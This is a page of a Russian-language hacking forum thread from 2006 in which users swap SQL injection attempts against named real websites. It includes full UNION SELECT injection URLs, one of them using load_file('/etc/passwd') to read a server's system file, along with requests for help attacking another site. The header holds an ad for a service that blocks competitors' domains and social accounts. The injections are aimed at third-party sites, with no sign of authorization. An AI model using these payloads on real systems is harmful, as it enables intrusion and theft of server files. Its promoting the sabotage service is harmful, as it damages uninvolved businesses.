Форум АНТИЧАТ - SQL-inj, FILE

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL-inj, FILE_LOAD Запрещен.

Страница 2 из 2

Опции темы

Поиск в этой теме

Опции просмотра

#11

20.12.2006, 18:45

SQLHACK

Голос разума

Регистрация: 27.09.2006

Сообщений: 529

Провел на форуме:
1607210

Репутация: 1617

Отправить сообщение для SQLHACK с помощью ICQ

Цитата:

Сообщение от Macro

"DROP DATABASE" [name | name expression]

name
The name of the databse.

Задвинул блин

ой не могу

#12

20.12.2006, 20:27

vmn

Познающий

Регистрация: 16.10.2006

Сообщений: 82

Провел на форуме:
248469

Репутация: 33

Гага, это ты через инъекцию в mysql собрался делать?) Удачи. Несколько команд в одном запросе не поддерживаются.

#13

20.12.2006, 20:29

blackybr

♠ ♦ ♣ ♥

Регистрация: 18.05.2006

Сообщений: 1,828

Провел на форуме:
8042357

Репутация: 3742

Отправить сообщение для blackybr с помощью ICQ

Отправить сообщение для blackybr с помощью AIM

Отправить сообщение для blackybr с помощью Yahoo

вопрос. если нет mysql.user, юзеров и тд. .. то что ты вообще хочешь ?))))
можешь xss провести =) но нах если там нет юзеров ? =)

__________________

Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2

#14

21.12.2006, 01:23

*D1VER

Участник форума

Регистрация: 05.12.2006

Сообщений: 112

Провел на форуме:
685950

Репутация: 175

Отправить сообщение для *D1VER с помощью ICQ

Аналогично File_load не катит !
Подобрал только кол-во полей!

http://www.prodaem.com/site/add.php?section=39'+union+select+1,1,1,1+/*

#15

21.12.2006, 01:42

c411k

Reservists Of Antichat - Level 6

Регистрация: 16.07.2005

Сообщений: 653

Провел на форуме:
8854279

Репутация: 2727

Цитата:

Сообщение от *D1VER

Аналогично File_load не катит !
Подобрал только кол-во полей!

http://www.prodaem.com/site/add.php?section=39'+union+select+1,1,1,1+/*

3.14*ишь..
что ты сделал чтобы вообе что нибудь выводило?
все пашет http://www.prodaem.com/site/add.php?section=-39'+union+select+0,load_file('/etc/passwd'),2,4'

__________________
ПИУ-ПИУ...

#16

21.12.2006, 01:49

*D1VER

Участник форума

Регистрация: 05.12.2006

Сообщений: 112

Провел на форуме:
685950

Репутация: 175

Очень интересно значит я неправильно всё сделал!

Буду знать СпС!

#17

21.12.2006, 05:09

*D1VER

Участник форума

Регистрация: 05.12.2006

Сообщений: 112

Провел на форуме:
685950

Репутация: 175

http://www.4event.ru/rub33.php?binn_rubrik_pl_catelems4=-1+union+select+null,null+/*

А с этим можно что нибудь сделать? Пробовал загрузить ('/etc/passwd')
Ну не в какую! Как сформировать запрос можно?

#18

21.12.2006, 08:38

gadjet

Познающий

Регистрация: 17.12.2005

Сообщений: 78

Провел на форуме:
464418

Репутация: 23

Вопрос немного не в тему: что значит, когда MySQL хэш начинается с символа '*' ?

Страница 2 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть первая	k00p3r	Чужие Статьи	1	12.07.2005 08:51
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход